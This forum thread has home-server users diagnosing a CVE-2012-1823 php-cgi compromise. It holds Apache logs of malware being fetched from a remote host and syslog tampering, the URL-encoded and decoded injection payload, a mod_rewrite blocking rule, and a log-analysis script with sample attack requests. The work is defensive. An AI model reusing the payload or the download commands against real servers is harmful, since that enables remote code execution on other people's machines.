I have been attacked and don't know why.

Got problems with your B2 or B3? Share and get helped!
RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Post by RandomUsername » 31 Oct 2013, 09:45

By a series of coincidences, I noticed that a crontab file was created yesterday for my www-data user (it was quite lucky, it could have been weeks before I noticed). The crontab is identical to the one mentioned here:

http://security.stackexchange.com/quest ... es-it-work

I have removed the crontab file, purged the /tmp directory and rebooted the server. I've checked every other file modified on the server in the last two days and I am fairly sure I've purged the threat. I've also blacklisted stablehost.us on my network. But how did it happen?

The IP address it came from is owned by HP and I have emailed abuse@hp.com. Here are the related entries from my apache error/access logs:

error.log:

[Wed Oct 30 14:09:26 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:26--  http://stablehost.us/bots/regular.bot
[Wed Oct 30 14:09:26 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 200 OK
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Length: 510 [text/plain]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Saving to: `/tmp/sh'
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126]      0K                                                       100% 18.1M=0s
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:27 (18.1 MB/s) - `/tmp/sh' saved [510/510]
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] ./.a: 1: Syntax error: "(" unexpected
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:27--  http://stablehost.us/bots/lol.c
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:09:27 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 200 OK
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] Length: 38100 (37K) [text/plain]
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] Saving to: `a.c'
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126]      0K .......... .......... .......... .......              100%  305K=0.1s
[Wed Oct 30 14:09:28 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:28 (305 KB/s) - `a.c' saved [38100/38100]
[Wed Oct 30 14:09:29 2013] [error] [client 15.185.117.126] a.c:169: warning: conflicting types for built-in function 'pow'
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] rm: cannot remove `/var/log/syslog': Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] touch: cannot touch `/var/log/syslog': Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chmod: changing permissions of `/var/log/syslog': Operation not permitted
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chattr: Permission denied while reading flags on /var/log/syslog
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Warning: Failed to create the file .a: Text file busy
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] \r  4 27642    4  1175    0     0   8456      0  0:00:03 --:--:--  0:00:03 17803
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] curl: (23) Failed writing body (0 != 1175)
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] rm: cannot remove `/var/log/syslog': Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] touch: cannot touch `/var/log/syslog': Permission denied
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chmod: changing permissions of `/var/log/syslog': Operation not permitted
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] chattr: Permission denied while reading flags on /var/log/syslog
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] --2013-10-30 14:09:31--  http://stablehost.us/botsb
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 404 Not Found
[Wed Oct 30 14:09:31 2013] [error] [client 15.185.117.126] 2013-10-30 14:09:31 ERROR 404: Not Found.
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:09:32 2013] [error] [client 15.185.117.126] \r 55  758k   55  420k    0     0   625k      0  0:00:01 --:--:--  0:00:01  701k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] \r100  758k  100  758k    0     0   663k      0  0:00:01  0:00:01 --:--:--  708k
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] ./.b: 1: \x7fELF\x01\x01\x01\x03\x02\x03\x01\xe0\x81\x04\b48\xbd: not found
[Wed Oct 30 14:09:33 2013] [error] [client 15.185.117.126] ./.b: 2: Syntax error: "(" unexpected
[Wed Oct 30 14:14:33 2013] [warn] [client 15.185.117.126] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Wed Oct 30 14:14:33 2013] [error] [client 15.185.117.126] Script timed out before returning headers: php
[Wed Oct 30 14:19:33 2013] [warn] [client 15.185.117.126] Timeout waiting for output from CGI script /usr/lib/cgi-bin/php
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:33--  http://stablehost.us/bots/regular.bot
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:19:33 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 200 OK
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Length: 510 [text/plain]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Saving to: `/tmp/sh'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]      0K                                                       100% 15.1M=0s
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:34 (15.1 MB/s) - `/tmp/sh' saved [510/510]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] .a: Text file busy
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] rm: cannot remove `/var/log/syslog': Permission denied
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] touch: cannot touch `/var/log/syslog': Permission denied
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] chmod: changing permissions of `/var/log/syslog': Operation not permitted
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] chattr: Permission denied while reading flags on /var/log/syslog
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:34--  http://stablehost.us/bots/lol.c
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 200 OK
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Length: 38100 (37K) [text/plain]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] Saving to: `a.c'
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126]      0K .......... .......... .......... .......              100%  456K=0.08s
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:34 (456 KB/s) - `a.c' saved [38100/38100]
[Wed Oct 30 14:19:34 2013] [error] [client 15.185.117.126] a.c:169: warning: conflicting types for built-in function 'pow'
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] rm: cannot remove `/var/log/syslog': Permission denied
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] touch: cannot touch `/var/log/syslog': Permission denied
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] chmod: changing permissions of `/var/log/syslog': Operation not permitted
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] chattr: Permission denied while reading flags on /var/log/syslog
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] \r100 27642  100 27642    0     0   116k      0 --:--:-- --:--:-- --:--:--  169k
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] ./.a: 1: Syntax error: "(" unexpected
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] --2013-10-30 14:19:36--  http://stablehost.us/botsb
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Resolving stablehost.us... 93.114.170.129
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] Connecting to stablehost.us|93.114.170.129|:80... connected.
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] HTTP request sent, awaiting response... 404 Not Found
[Wed Oct 30 14:19:36 2013] [error] [client 15.185.117.126] 2013-10-30 14:19:36 ERROR 404: Not Found.
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126]                                  Dload  Upload   Total   Spent    Left  Speed
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] \r  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
[Wed Oct 30 14:19:37 2013] [error] [client 15.185.117.126] \r 61  758k   61  469k    0     0   593k      0  0:00:01 --:--:--  0:00:01  653k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] \r100  758k  100  758k    0     0   589k      0  0:00:01  0:00:01 --:--:--  626k
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] ./.b: 1:
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] \x7fELF\x01\x01\x01\x03\x02\x03\x01\xe0\x81\x04\b48\xbd: not found
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] ./.b: 2:
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] Syntax error: "(" unexpected
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126]
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php-cgi
[Wed Oct 30 14:19:38 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php.cgi
[Wed Oct 30 14:19:39 2013] [error] [client 15.185.117.126] script not found or unable to stat: /usr/lib/cgi-bin/php4
access.log:

Code:

15.185.117.126 - - [30/Oct/2013:13:27:58 +0000] "HEAD / HTTP/1.0" 200 278 "-" "-"

15.185.117.126 - - [30/Oct/2013:14:09:26 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 535 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:33 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 200 347 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:38 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:38 +0000] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 492 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
15.185.117.126 - - [30/Oct/2013:14:19:39 +0000] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 489 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25"
Obviously, I want to close whatever hole was used here but Google hasn't really brought anything up. How was Apache tricked into downloading a file to my server?
Last edited by RandomUsername on 07 Nov 2013, 06:42, edited 2 times in total.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:04

if you translate the url you get

Code:

POST /cgi-bin/php-cgi -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
Apparently your cgi-bin/php allows config commands to be given on the URL. After this it seems to run arbitrary commands directly from the URL. Some fail and become errors. So, your PHP allows remote execution as well. I guess there is a setting to prevent this. I guess those are the items listed above. So first your virus opened up PHP by passing arbitrary configuration parameters, which then allowed it to execute arbitrary code from the URL.
Last edited by Ubi on 31 Oct 2013, 10:15, edited 1 time in total.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:10

Ah, OK. Thanks for that. I don't think I've ever changed that so I wonder if it's a default setting on the B3.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:16

This is in my sites-enabled/bubba file:

Code:

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>
Is the "allow from all" line the problem? Should I change it to "Deny from all"? I'm wondering if the admin web interface uses cgi and that's why it's enabled.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:17

It's a serious issue; PHP shouldn't allow config to be set outside of the main php.ini.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:17

Here's the exploit and description:

http://www.exploit-db.com/exploits/29290/

My B3 is running PHP Version: 5.3.3-7+squeeze4ex1 and is thus vulnerable
I guess other people have this problem too.

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:22

Thanks. I notice that was only posted a couple of days ago so is this a fairly new exploit? Is mitigation only possible by patching Apache as implied by that article?

I've set the ScriptAlias section to "deny from all" as I mentioned above, will that do the trick do you think?

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 10:34

It is not a new exploit, it is over a year old. Just this iteration is new.

from http://stopmalvertising.com/security/se ... tives.html

Code:

# PHP-CGI Remote Code Execution Bug (CVE-2012-1823)
# The directive below will help against the 
# PHP-CGI Remote Code Execution Bug (CVE-2012-1823) 
# discovered on the 3rd May 2012 by Security Researchers from Eindbazen
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]
I have not tested this myself.

The guts of the matter are here:
http://eindbazen.net/2012/05/php-cgi-ad ... 2012-1823/

RandomUsername
Posts: 904
Joined: 09 Oct 2009, 18:49

Re: I have been attacked and don't know why.

Post by RandomUsername » 31 Oct 2013, 10:54

Where should I be putting that rule? In /etc/apache2/conf.d/admin.conf ?

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 31 Oct 2013, 12:07

Ubi wrote:It is not a new exploit, it is over a year old. Just this iteration is new.

from http://stopmalvertising.com/security/se ... tives.html

Code:

# PHP-CGI Remote Code Execution Bug (CVE-2012-1823)
# The directive below will help against the 
# PHP-CGI Remote Code Execution Bug (CVE-2012-1823) 
# discovered on the 3rd May 2012 by Security Researchers from Eindbazen
# PHP-CGI Vulnerability
RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC]
RewriteRule (.*) - [F,L]
I have not tested this myself.

The guts of the matter are here:
http://eindbazen.net/2012/05/php-cgi-ad ... 2012-1823/
I wonder if that regex will catch every attempt. If the perpetrator replaces one %3D instance with '=' he'll go straight past this blocking rule.

This whole thing seems like a serious issue though. I should probably check my logs for similar attempts and maybe add another string match rule to my firewall.

Ubi
Posts: 1547
Joined: 17 Jul 2007, 09:01

Re: I have been attacked and don't know why.

Post by Ubi » 31 Oct 2013, 14:45

If I understand the regexp, it specifically attacks the first %2d in the query string, which pretends to be an execution flag for the php process. This particular primary %2d is the key to the exploit. But I fully agree with your assessment. However, considering this thing is executed by 31337 script kiddies, I assume you reduce the threat by 95% with this rule. It certainly is not a cure, and should be addressed by the maintainer.

It's interesting, this is actually the first real remote-execution exploit for the B3 ever afaik.

Gordon
Posts: 1287
Joined: 10 Aug 2011, 03:18

Re: I have been attacked and don't know why.

Post by Gordon » 01 Nov 2013, 06:00

According to Eindbazen the "-" does not need to be url encoded. Writing "%2d" is just to hide what they're doing from less educated people. And if I understand correctly the exploit will also work if the query string is prefixed with one or more space characters, i.e. %20 but possibly also %09.

Less chance of me getting infected BTW. On my defaulthost entry I have overruled /cgi-bin/ to a different location that contains no scripts, so they'll need to access one of the named hosts. So far the logs show that all the fishy stuff targets the default host only and I'm okay with that.
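As an added example (not code from this thread or from Excito), here is the decoding Ubi did by hand turned into a small checker you can run over an access.log. It applies the same rule Apache's mod_cgi uses to decide whether a query string becomes command-line arguments (RFC 3875 section 4.4: only when the raw query string contains no '='), percent-decodes the pieces, lists the php.ini settings the -d arguments override, and next to that evaluates the RewriteCond regex quoted above against the raw query string, so you can see what that rule would and would not have blocked. The log lines are constructed for the example: the first is the on-page request with its query string shortened to three arguments, the others are variants (an unencoded -d, a %20-prefixed one as in Gordon's note, one with a literal '=', and a benign request); 192.0.2.10 and the curl user agent are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample, modelled on the access.log excerpts in this thread.
# Line 1 is the on-page request with its query string shortened to three
# arguments; lines 2-5 are variants built here to probe the detection rule.
SAMPLE_LOG = r'''
15.185.117.126 - - [30/Oct/2013:14:19:33 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 347 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Nov/2013:10:00:00 +0000] "POST /cgi-bin/php?-d+allow_url_include%3Don+-n HTTP/1.1" 200 300 "-" "curl/7.26.0"
192.0.2.10 - - [01/Nov/2013:10:00:01 +0000] "POST //cgi-bin/php?%20%2D%64+allow_url_include%3Don HTTP/1.1" 200 300 "-" "curl/7.26.0"
192.0.2.10 - - [01/Nov/2013:10:00:02 +0000] "POST /cgi-bin/php?-d+allow_url_include=on HTTP/1.1" 200 300 "-" "curl/7.26.0"
192.0.2.10 - - [01/Nov/2013:10:00:03 +0000] "GET /index.php?page=1 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
'''

# Apache combined log: client, identd, user, [time], "request line", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# The rule posted in this thread, RewriteCond %{QUERY_STRING} ^(%2d|\-)[^=]+$ [NC],
# as a Python regex. mod_rewrite applies it to the raw, still-encoded query string.
REWRITECOND_RE = re.compile(r'^(%2d|-)[^=]+$', re.IGNORECASE)


def cgi_argv(raw_query):
    """Argument vector mod_cgi would hand to the CGI program, or [] if none.

    RFC 3875 section 4.4: a query string containing an unencoded '=' is never
    turned into command-line arguments; otherwise it is split on '+' and each
    piece is percent-decoded.  That is exactly what CVE-2012-1823 relies on.
    """
    if not raw_query or '=' in raw_query:
        return []
    return [unquote(tok) for tok in raw_query.split('+')]


def php_cgi_overrides(argv):
    """php.ini settings that a php-cgi argv like ['-d', 'key=value', ...] overrides."""
    settings = {}
    for i, tok in enumerate(argv):
        if tok == '-d' and i + 1 < len(argv) and '=' in argv[i + 1]:
            key, _, value = argv[i + 1].partition('=')
            settings[key] = value.strip('"')
    return settings


def looks_like_option_injection(argv):
    """True if any argument mod_cgi would pass looks like a command-line option.

    Leading whitespace is stripped first, so a %20- or %09-prefixed token is
    flagged too (conservative: this is a detection rule, not a claim that
    php-cgi honours such a token).
    """
    return any(tok.lstrip().startswith('-') for tok in argv)


def analyse_line(line):
    """Classify one access-log line; None if it is not a parsable request."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, raw_query = m.group('target').partition('?')
    argv = cgi_argv(raw_query)
    return {
        'ip': m.group('ip'),
        'path': path,
        'argv': argv,
        'injection': '/cgi-bin/' in path and looks_like_option_injection(argv),
        'blocked_by_rewritecond': REWRITECOND_RE.match(raw_query) is not None,
        'overrides': php_cgi_overrides(argv),
    }


def analyse(log_text):
    """Run analyse_line over every non-empty line of an access log."""
    return [r for r in map(analyse_line, log_text.strip().splitlines()) if r]


if __name__ == '__main__':
    for r in analyse(SAMPLE_LOG):
        verdict = 'INJECTION' if r['injection'] else 'ok'
        blocked = 'blocked' if r['blocked_by_rewritecond'] else 'passes'
        print(f"{r['ip']:16} {verdict:9} rule:{blocked:7} {r['path']} argv={r['argv']} ini={r['overrides']}")
```

Running it shows that the on-page request and the unencoded -d variant are both flagged and both matched by the RewriteCond, the %20-prefixed variant is flagged but slips past the rule, and the variant with a literal '=' is neither: with an unencoded '=' in the query string mod_cgi never builds argv at all, which is why the `[^=]+$` part of the rule is a precondition of the attack rather than a hole in the filter. To check a real log, replace SAMPLE_LOG with the file contents and grep the output for INJECTION.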

DanielM
Posts: 637
Joined: 28 Mar 2008, 06:37
Location: Sweden

Re: I have been attacked and don't know why.

Post by DanielM » 01 Nov 2013, 07:52

Ok. This is weird. It happened to me too. I've been struggling for hours today to try to find out what happened and now I found this thread.

I noticed this morning that my usual www-data crontab stuff (I do some homeautomation related stuff) didn't run and when I checked www-datas crontab was replaced with a one running /tmp/.UNIX/update every minute. The entire /tmp/.UNIX directory contains only strange stuff, some of it created yesterday evening and some as old as 2002 (which I guess assumes the file dates aren't real). Followed the scripts and what is really happening is that a binary with the name /tmp/.UNIX/syslogging is called (no idea what it does). Fixed the crontab now and I'll clear out /tmp and reboot, just want to do some investigation first. Just wondering how they got in, is this the same way in as in RandomUsernames B3? And if so, is it a coincidence that it's happening at almost the same time?

Anyway, some snippets from my Apache logs:

error.log

Code:

[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <b>Security Alert!</b> The PHP CGI cannot be accessed directly.
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150]
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>This PHP CGI binary was compiled with force-cgi-redirect enabled.  This
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] means that a page will only be served up if the REDIRECT_STATUS CGI variable is
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] set, e.g. via an Apache Action directive.</p>
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>For more information as to <i>why</i> this behaviour exists, see the <a href="http://php.net/security.cgi-bin">manual page for CGI security</a>.</p>
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <p>For more information about changing this behaviour or re-enabling this webserver,
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] consult the installation file that came with this distribution, or visit
[Thu Oct 31 19:31:38 2013] [error] [client 208.84.156.150] <a href="http://php.net/install.windows">the manual page</a>.</p>
